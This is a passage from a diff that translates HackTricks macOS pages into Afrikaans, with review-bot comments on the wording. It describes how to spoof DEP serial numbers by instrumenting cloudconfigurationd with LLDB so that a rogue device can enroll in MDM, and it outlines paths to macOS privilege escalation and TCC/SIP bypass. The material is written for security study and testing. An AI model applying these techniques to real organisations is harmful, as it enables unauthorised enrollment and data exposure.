Sleutelkomponente sluit in: -- **`mdmclient`**: Communicates with MDM servers and triggers DEP check-ins on macOS versions before 10.13.4. -- **`profiles`**: Manages Configuration Profiles, and triggers DEP check-ins on macOS versions 10.13.4 and later. -- **`cloudconfigurationd`**: Manages DEP API communications and retrieves Device Enrollment profiles. +- **`mdmclient`**: Kommunikeer met MDM-bedieners en veroorsaak DEP-inchecks op macOS-weergawes voor 10.13.4. +- **`profiles`**: Bestuur Konfigurasieprofiel en veroorsaak DEP-inchecks op macOS-weergawes 10.13.4 en later. +- **`cloudconfigurationd`**: Bestuur DEP API-kommunikasie en haal Toestelinskrywingsprofiel op. -DEP check-ins utilize the `CPFetchActivationRecord` and `CPGetActivationRecord` functions from the private Configuration Profiles framework to fetch the Activation Record, with `CPFetchActivationRecord` coordinating with `cloudconfigurationd` through XPC. +DEP-inchecks maak gebruik van die `CPFetchActivationRecord` en `CPGetActivationRecord` funksies van die private Konfigurasieprofiel-raamwerk om die Aktiveringsrekord op te haal, waar `CPFetchActivationRecord` deur middel van XPC met `cloudconfigurationd` saamwerk. -## Tesla Protocol and Absinthe Scheme Reverse Engineering +## Tesla-Protokol en Absint-Skema-Ontleding -The DEP check-in involves `cloudconfigurationd` sending an encrypted, signed JSON payload to _iprofiles.apple.com/macProfile_. The payload includes the device's serial number and the action "RequestProfileConfiguration". The encryption scheme used is referred to internally as "Absinthe". Unraveling this scheme is complex and involves numerous steps, which led to exploring alternative methods for inserting arbitrary serial numbers in the Activation Record request. +Die DEP-incheck behels dat `cloudconfigurationd` 'n versleutelde, ondertekende JSON-payload na _iprofiles.apple.com/macProfile_ stuur. Die payload sluit die toestel se serienommer en die aksie "RequestProfileConfiguration" in. 
Die gebruikte versleutelingsskema word intern as "Absint" verwys. Die ontrafeling van hierdie skema is kompleks en behels verskeie stappe, wat gelei het tot die ondersoek van alternatiewe metodes om arbitrêre serienommers in die Aktiveringsrekordversoek in te voeg. -## Proxying DEP Requests +## DEP Versoeke Proksie -Attempts to intercept and modify DEP requests to _iprofiles.apple.com_ using tools like Charles Proxy were hindered by payload encryption and SSL/TLS security measures. However, enabling the `MCCloudConfigAcceptAnyHTTPSCertificate` configuration allows bypassing the server certificate validation, although the payload's encrypted nature still prevents modification of the serial number without the decryption key. +Pogings om DEP-versoeke na _iprofiles.apple.com_ te onderskep en te wysig met behulp van hulpmiddels soos Charles Proxy is belemmer deur payload-versleuteling en SSL/TLS-sekuriteitsmaatreëls. Die aktivering van die `MCCloudConfigAcceptAnyHTTPSCertificate`-konfigurasie maak egter omseiling van die sertifikaatvalidering van die bediener moontlik, alhoewel die versleutelde aard van die payload steeds die wysiging van die serienommer sonder die dekripsiesleutel verhoed. -## Instrumenting System Binaries Interacting with DEP +## Instrumentering van Stelselbinêre Lêers wat met DEP Interageer -Instrumenting system binaries like `cloudconfigurationd` requires disabling System Integrity Protection (SIP) on macOS. With SIP disabled, tools like LLDB can be used to attach to system processes and potentially modify the serial number used in DEP API interactions. This method is preferable as it avoids the complexities of entitlements and code signing. +Die instrumentering van stelselbinêre lêers soos `cloudconfigurationd` vereis die deaktivering van Stelselintegriteitsbeskerming (SIP) op macOS. 
Met SIP gedeaktiveer, kan hulpmiddels soos LLDB gebruik word om aan stelselprosesse te heg en moontlik die serienommer wat in DEP API-interaksies gebruik word, te wysig. Hierdie metode is verkieslik omdat dit die kompleksiteite van toekennings en kodesondertekening vermy. -**Exploiting Binary Instrumentation:** -Modifying the DEP request payload before JSON serialization in `cloudconfigurationd` proved effective. The process involved: +**Uitbuiting van Binêre Instrumentering:** +Die wysiging van die DEP-versoek-payload voor JSON-serialisering in `cloudconfigurationd` was doeltreffend. Die proses het die volgende ingesluit: -1. Attaching LLDB to `cloudconfigurationd`. -2. Locating the point where the system serial number is fetched. -3. Injecting an arbitrary serial number into the memory before the payload is encrypted and sent. +1. Koppel LLDB aan `cloudconfigurationd`. +2. Vind die punt waar die stelselserienommer opgehaal word. +3. Voeg 'n arbitrêre serienommer in die geheue in voordat die payload versleutel en gestuur word. -This method allowed for retrieving complete DEP profiles for arbitrary serial numbers, demonstrating a potential vulnerability. +Hierdie metode het dit moontlik gemaak om volledige DEP-profiels vir arbitrêre serienommers op te haal, wat 'n potensiële kwesbaarheid aandui. -### Automating Instrumentation with Python +### Outomatisering van Instrumentering met Python -The exploitation process was automated using Python with the LLDB API, making it feasible to programmatically inject arbitrary serial numbers and retrieve corresponding DEP profiles. +Die uitbuitingsproses is geoutomatiseer met behulp van Python en die LLDB API, wat dit moontlik maak om arbitrêre serienommers outomaties in te voeg en ooreenstemmende DEP-profiels op te haal. 
-### Potential Impacts of DEP and MDM Vulnerabilities +### Potensiële Impakte van DEP en MDM-kwesbaarhede -The research highlighted significant security concerns: +Die navorsing het beduidende sekuriteitskwessies beklemtoon: -1. **Information Disclosure**: By providing a DEP-registered serial number, sensitive organizational information contained in the DEP profile can be retrieved. -2. **Rogue DEP Enrollment**: Without proper authentication, an attacker with a DEP-registered serial number can enroll a rogue device into an organization's MDM server, potentially gaining access to sensitive data and network resources. +1. **Inligtingsoopmaking**: Deur 'n DEP-geregistreerde serienommer te voorsien, kan sensitiewe organisatoriese inligting wat in die DEP-profiel bevat word, opgehaal word. +2. **Rogue DEP-inskrywing**: Sonder behoorlike outentisering kan 'n aanvaller met 'n DEP-geregistreerde serienommer 'n skelmtoestel in 'n organisasie se MDM-bediener inskryf, wat moontlik toegang tot sensitiewe data en netwerkbronne kan gee. -In conclusion, while DEP and MDM provide powerful tools for managing Apple devices in enterprise environments, they also present potential attack vectors that need to be secured and monitored. +Ten slotte, alhoewel DEP en MDM kragtige hulpmiddels bied vir die bestuur van Apple-toestelle in ondernemingsomgewings, bied hulle ook potensiële aanvalsvektore wat beveilig en gemonitor moet word.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
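Review bot: the internal codename is translated in `+## Tesla-Protokol en Absint-Skema-Ontleding` and in `+Die gebruikte versleutelingsskema word intern as "Absint" verwys.`, but "Absinthe" is the name Apple's binaries use and the name readers will search for, so keep it as `Absinthe`; the same heading renders "Reverse Engineering" as "Ontleding" (analysis), which loses the point of the section, so leave "Reverse Engineering" untranslated or use "Omgekeerde Ingenieurswese". Smaller points in the same hunk: `+- **`profiles`**: Bestuur Konfigurasieprofiel` drops the plural of "Configuration Profiles" (should be "Konfigurasieprofiele", likewise "Toestelinskrywingsprofiele" two lines later); `+1. **Inligtingsoopmaking**` is an unusual rendering of "Information Disclosure" where "Inligtingsblootstelling" is the established term; and `+2. **Rogue DEP-inskrywing**` keeps "Rogue" in English while the body of the same item translates it as "skelmtoestel", so pick one. The footer here leaves `[**SUBSCRIPTION PLANS**]` in English whereas the next file in this patch translates it to `SUBSKRIPSIEPLANNE`; the footer is a shared template and should be identical in every translated file.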
diff --git a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md index 5959110b4..847bfa4e3 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/macos-serial-number.md @@ -1,71 +1,71 @@ -# macOS Serial Number +# macOS Seriële Nommer
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Basic Information +## Basiese Inligting -Apple devices post-2010 have serial numbers consisting of **12 alphanumeric characters**, each segment conveying specific information: +Apple-toestelle na 2010 het serienommers wat bestaan uit **12 alfanumeriese karakters**, waarvan elke segment spesifieke inligting oordra: -- **First 3 Characters**: Indicate the **manufacturing location**. -- **Characters 4 & 5**: Denote the **year and week of manufacture**. -- **Characters 6 to 8**: Serve as a **unique identifier** for each device. -- **Last 4 Characters**: Specify the **model number**. +- **Eerste 3 Karakters**: Dui die **vervaardigingsplek** aan. +- **Karakters 4 & 5**: Dui die **jaar en week van vervaardiging** aan. +- **Karakters 6 tot 8**: Diens as 'n **unieke identifiseerder** vir elke toestel. +- **Laaste 4 Karakters**: Spesifiseer die **modelnommer**. -For instance, the serial number **C02L13ECF8J2** follows this structure. +Byvoorbeeld, die serienommer **C02L13ECF8J2** volg hierdie struktuur. -### **Manufacturing Locations (First 3 Characters)** -Certain codes represent specific factories: -- **FC, F, XA/XB/QP/G8**: Various locations in the USA. -- **RN**: Mexico. -- **CK**: Cork, Ireland. -- **VM**: Foxconn, Czech Republic. -- **SG/E**: Singapore. -- **MB**: Malaysia. +### **Vervaardigingsplekke (Eerste 3 Karakters)** +Sekere kodes verteenwoordig spesifieke fabrieke: +- **FC, F, XA/XB/QP/G8**: Verskeie plekke in die VSA. +- **RN**: Meksiko. +- **CK**: Cork, Ierland. +- **VM**: Foxconn, Tsjeggiese Republiek. +- **SG/E**: Singapoer. +- **MB**: Maleisië. - **PT/CY**: Korea. - **EE/QT/UV**: Taiwan. -- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**: Different locations in China. -- **C0, C3, C7**: Specific cities in China. -- **RM**: Refurbished devices. +- **FK/F1/F2, W8, DL/DM, DN, YM/7J, 1C/4H/WQ/F7**: Verskillende plekke in China. +- **C0, C3, C7**: Spesifieke stede in China. +- **RM**: Opgelapte toestelle. 
-### **Year of Manufacturing (4th Character)** -This character varies from 'C' (representing the first half of 2010) to 'Z' (second half of 2019), with different letters indicating different half-year periods. +### **Vervaardigingsjaar (4de Karakter)** +Hierdie karakter wissel van 'C' (wat die eerste helfte van 2010 verteenwoordig) tot 'Z' (tweede helfte van 2019), met verskillende letters wat verskillende halfjaarperiodes aandui. -### **Week of Manufacturing (5th Character)** -Digits 1-9 correspond to weeks 1-9. Letters C-Y (excluding vowels and 'S') represent weeks 10-27. For the second half of the year, 26 is added to this number. +### **Vervaardigingsweek (5de Karakter)** +Syfers 1-9 stem ooreen met weke 1-9. Die letters C-Y (uitgesluit klinkers en 'S') verteenwoordig weke 10-27. Vir die tweede helfte van die jaar word 26 by hierdie nommer gevoeg. -### **Unique Identifier (Characters 6 to 8)** -These three digits ensure each device, even of the same model and batch, has a distinct serial number. +### **Unieke Identifiseerder (Karakters 6 tot 8)** +Hierdie drie syfers verseker dat elke toestel, selfs van dieselfde model en lot, 'n unieke serienommer het. -### **Model Number (Last 4 Characters)** -These digits identify the specific model of the device. +### **Modelnommer (Laaste 4 Karakters)** +Hierdie syfers identifiseer die spesifieke model van die toestel. -### Reference +### Verwysing * [https://beetstech.com/blog/decode-meaning-behind-apple-serial-number](https://beetstech.com/blog/decode-meaning-behind-apple-serial-number)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
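Review bot: `+- **Karakters 6 tot 8**: Diens as 'n **unieke identifiseerder**` uses the noun "Diens" (service) where the verb "Dien" is required; it should read "Dien as 'n unieke identifiseerder". In the same hunk the title `+# macOS Seriële Nommer` does not match the term used throughout the body (`serienommer`, `serienommers`), so "macOS Serienommer" keeps the page under one searchable term, and `+- **RM**: Opgelapte toestelle.` renders "Refurbished devices" as "patched-up devices" where "Opgeknapte toestelle" is the standard word. The footer in this file translates `SUBSCRIPTION PLANS` to `SUBSKRIPSIEPLANNE` while the footer of the preceding file leaves it in English; make the shared footer identical across files.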
diff --git a/macos-hardening/macos-security-and-privilege-escalation/README.md b/macos-hardening/macos-security-and-privilege-escalation/README.md index 0fcf8364a..dc0ec533c 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/README.md @@ -1,45 +1,45 @@ -# macOS Security & Privilege Escalation +# macOS Sekuriteit & Voorregverhoging
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van nuus en insigte in werklikheid -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagbounties wat begin en belangrike platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic MacOS +## Basiese MacOS -If you are not familiar with macOS, you should start learning the basics of macOS: +As jy nie bekend is met macOS nie, moet jy begin om die basiese beginsels van macOS te leer: -* Special macOS **files & permissions:** +* Spesiale macOS **lêers & toestemmings:** {% content-ref url="macos-files-folders-and-binaries/" %} [macos-files-folders-and-binaries](macos-files-folders-and-binaries/) {% endcontent-ref %} -* Common macOS **users** +* Algemene macOS **gebruikers** {% content-ref url="macos-users.md" %} [macos-users.md](macos-users.md) 
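Review bot: `+Bly op hoogte van die vinnige wêreld van hacking deur middel van nuus en insigte in werklikheid` mistranslates "real-time news and insights": "in werklikheid" means "in reality", and the second copy of this sponsor block at the end of the same file renders the identical English line as `deur middel van real-time nuus en insigte`. Use "intydse nuus en insigte" in both places. The same hunk leaves `**Hacking Insights**\` untranslated while the later copy has `+**Hacking-insigte**\`, and renders "bug bounty hunters" as "foutjagters" here but "foutbeloningsjagters" later; the two HackenProof blocks are verbatim copies in the source and should stay verbatim copies in the translation.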
@@ -51,56 +51,56 @@ If you are not familiar with macOS, you should start learning the basics of macO [macos-applefs.md](macos-applefs.md) {% endcontent-ref %} -* The **architecture** of the k**ernel** +* Die **argitektuur** van die k**ernel** {% content-ref url="mac-os-architecture/" %} [mac-os-architecture](mac-os-architecture/) {% endcontent-ref %} -* Common macOS n**etwork services & protocols** +* Algemene macOS-n**etwerkdienste & protokolle** {% content-ref url="macos-protocols.md" %} [macos-protocols.md](macos-protocols.md) {% endcontent-ref %} * **Opensource** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) - * To download a `tar.gz` change a URL such as [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) to [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) +* Om 'n `tar.gz` af te laai, verander 'n URL soos [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) na [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) ### MacOS MDM -In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**: +In maatskappye word **macOS**-stelsels hoogstwaarskynlik **bestuur met 'n MDM**. 
Daarom is dit interessant vir 'n aanvaller om te weet **hoe dit werk**: {% content-ref url="../macos-red-teaming/macos-mdm/" %} [macos-mdm](../macos-red-teaming/macos-mdm/) {% endcontent-ref %} -### MacOS - Inspecting, Debugging and Fuzzing +### MacOS - Inspekteer, Debuksie en Fuzzing {% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} [macos-apps-inspecting-debugging-and-fuzzing](macos-apps-inspecting-debugging-and-fuzzing/) {% endcontent-ref %} -## MacOS Security Protections +## MacOS Sekuriteitsbeskerming {% content-ref url="macos-security-protections/" %} [macos-security-protections](macos-security-protections/) {% endcontent-ref %} -## Attack Surface +## Aanvalsoppervlak -### File Permissions +### Lêertoestemmings -If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\ -This could occur in the following situations: +As 'n **proses wat as root loop** 'n lêer skryf wat deur 'n gebruiker beheer kan word, kan die gebruiker dit misbruik om **voorregte te verhoog**.\ +Dit kan in die volgende situasies gebeur: -* File used was already created by a user (owned by the user) -* File used is writable by the user because of a group -* File used is inside a directory owned by the user (the user could create the file) -* File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file) +* Die gebruikte lêer is reeds deur 'n gebruiker geskep (behoort aan die gebruiker) +* Die gebruikte lêer is skryfbaar deur die gebruiker as gevolg van 'n groep +* Die gebruikte lêer is binne 'n gids wat aan die gebruiker behoort (die gebruiker kan die lêer skep) +* Die gebruikte lêer is binne 'n gids wat aan root behoort, maar die gebruiker het skryftoegang daartoe as gevolg van 'n groep (die gebruiker kan die lêer skep) -Being able to **create a file** that is going to be **used by root**, allows a user to **take advantage of its 
content** or even create **symlinks/hardlinks** to point it to another place. +Om 'n lêer te **skep** wat deur root gebruik gaan word, stel 'n gebruiker in staat om van die inhoud daarvan gebruik te maak of selfs **simboliese skakels/harde skakels** te skep om dit na 'n ander plek te verwys. -For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**: +Vir hierdie soort kwesbaarhede, moenie vergeet om kwesbare `.pkg`-installeerders te **ondersoek** nie: {% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} [macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md) 
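Review bot: the nested bullet `-    * To download a `tar.gz` change a URL such as ...` is replaced by a top-level bullet `+* Om 'n `tar.gz` af te laai, verander 'n URL soos ...`, so the download hint is no longer a sub-item of the `* **Opensource** macOS:` bullet and the rendered list structure changes; keep the four leading spaces on the translated line. Also in this hunk, `+### MacOS - Inspekteer, Debuksie en Fuzzing`: "Debuksie" is not an Afrikaans word and "Inspekteer" is the verb where the English heading uses gerunds; "Inspeksie, Ontfouting en Fuzzing" matches the original.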
@@ -108,33 +108,32 @@ For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` insta -### File Extension & URL scheme app handlers +### Lêeruitbreiding & URL-skema-apphanteraars -Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols +Vreemde programme wat geregistreer is deur lêeruitbreidings, kan misbruik word en verskillende toepassings kan geregistreer word om spesifieke protokolle oop te maak {% content-ref url="macos-file-extension-apps.md" %} [macos-file-extension-apps.md](macos-file-extension-apps.md) {% endcontent-ref %} -## macOS TCC / SIP Privilege Escalation +## macOS TCC / SIP Voorregverhoging -In macOS **applications and binaries can have permissions** to access folders or settings that make them more privileged than others. +In macOS **kan programme en binnerwerke toestemmings hê** om toegang tot lêers of instellings te verkry wat hulle bevoorregter maak as ander. -Therefore, an attacker that wants to successfully compromise a macOS machine will need to **escalate its TCC privileges** (or even **bypass SIP**, depending on his needs). +Daarom sal 'n aanvaller wat 'n macOS-rekenaar suksesvol wil kompromitteer, sy TCC-voorregte moet **verhoog** (of selfs **SIP omseil**, afhangende van sy behoeftes). -These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**. +Hierdie voorregte word gewoonlik gegee in die vorm van **toekennings** waarvoor die toepassing onderteken is, of die toepassing kan toegang versoek en nadat die **gebruiker dit goedgekeur** het, kan dit in die **TCC-databasisse** gevind word. 
'n Proses kan hierdie voorregte ook verkry deur 'n **kind van 'n proses** te wees met daardie **voorregte**, aangesien hulle gewoonlik **oorerf** word. -Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses). +Volg hierdie skakels om verskillende maniere te vind om [**voorregte in TCC te verhoog**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), om [**TCC te omseil**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) en hoe in die verlede [**SIP omseil is**](macos-security-protections/macos-sip.md#sip-bypasses). -## macOS Traditional Privilege Escalation +## macOS Tradisionele Voorregverhoging -Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints: +Natuurlik moet jy as 'n rooi span ook belangstel om na root te verhoog. Kyk na die volgende berig vir 'n paar wenke: {% content-ref url="macos-privilege-escalation.md" %} [macos-privilege-escalation.md](macos-privilege-escalation.md) {% endcontent-ref %} - -## References +## Verwysings * [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) @@ -144,29 +143,29 @@ Of course from a red teams perspective you should be also interested in escalati
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutbeloningsjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die 